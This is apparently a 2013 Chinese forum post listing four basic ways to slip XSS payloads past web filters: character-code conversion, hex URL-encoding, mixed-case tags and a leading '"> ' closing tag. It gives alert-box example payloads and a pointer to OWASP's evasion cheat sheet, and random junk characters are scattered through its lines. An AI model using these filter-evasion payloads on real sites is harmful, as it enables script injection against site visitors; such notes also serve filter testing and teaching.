四种超级基础的绕过方法。
" p3 }# l# Q0 y5 ^. D/ X1.转换为ASCII码
5 O; t' {. K4 C例子:原脚本为<script>alert(‘I love F4ck’)</script >, A9 r/ f1 I7 b) P) Y/ e$ o, z4 [* F
通过转换,变成:% b- N& X% ]0 F% z% ~& R) y
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
* j. E+ ^, ^ u ; r6 a2 g: ?9 Q) b/ n) m
2.转换为HEX(十六进制)
% c, x; p5 W2 R例子:原脚本为<script>alert(‘I love F4ck’)</script>! B2 h" b8 j' A8 X' z
通过转换,变成:% s0 l, \/ _0 P1 h4 {. P4 B7 @
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
9 ` _/ b! }3 R5 U
( k5 t' c! K3 J+ d3.转换脚本的大小写
7 F! Q7 W' D a! |例子:原脚本为<script>alert(‘I love F4ck’)</script>8 v. e" A9 @" w! k, Q
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
' x: i% Y4 U! ~+ e 0 ?# L+ X! b7 j0 n# i- O
4.增加闭合标记”>: i7 H+ |) W Z# e2 E0 T5 ?- d+ Y
例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 R$ u5 k9 |" M9 f" W6 T' G' t- I转换为:”><script>alert(‘I love F4ck’)</script>
9 S# @! h0 k4 h8 D# V更详细绕过技术请参考此网页
# }/ N- d7 v" Z+ W- xhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet7 u3 \, } j' }+ W1 h) \3 W
" E" F, g4 j- O转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对